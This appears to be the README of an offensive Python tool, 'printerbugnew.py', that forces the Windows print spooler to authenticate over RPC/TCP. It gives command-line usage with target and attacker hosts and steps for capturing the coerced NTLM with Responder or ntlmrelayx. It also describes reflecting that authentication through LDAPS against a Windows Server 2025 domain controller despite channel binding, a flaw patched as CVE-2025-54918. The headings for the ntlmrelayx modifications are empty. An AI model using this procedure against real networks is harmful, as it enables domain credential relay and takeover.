printerbugnew.py <target_host> [username] [password] [domain] [attacker_host] [tcp_port]

printerbugnew.py 192.168.1.100

printerbugnew.py 192.168.1.100 admin Password123 DOMAIN

printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50

printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50 49152

• Target must be Windows 11 22H2+ or Server 2025 (RPC over TCP default)
• For older versions, spoolss uses RPC over Named Pipes (SMB)
• Ensure ports 135 and dynamic RPC ports (49152-65535) are open
• Start Responder or ntlmrelayx on attacker_host to capture auth
• Kerberos fails in this case due to a bad SPN from the spooler, forcing NTLM fallback.
• Find the target spooler’s RPC/TCP port by querying the target Endpoint Mapper (EPM) on TCP/135 for the interface UUID 12345678-1234-abcd-ef00-0123456789ab. You can use rpcdump.py, PortQry, or any tool you prefer - or just implement the EPM lookup directly in this code ;)
• Based on https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py
  
  
  
  
  
  
  
  

This exploit via reflection works only on W2025 with the "new" printerbug (DCERPC instead of Named Pipes). You’ll need to modify ntlmrelayx at a couple of points for it to work. After that, you can remotely trigger the printer bug on a W2025 DC and reflect authentication via LDAPS(!), even if Channel Bindings is REQUIRED

ldaprelayclient.py:

rpcrelayserver.py


and relay ;)

The vulnerability was fixed in September 2025 Patch Tuesday: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918

The fix ensures that the MIC is always calculated, even when the Type 3 message is empty.

Thanks to the author of this CVE for a valuable hint :)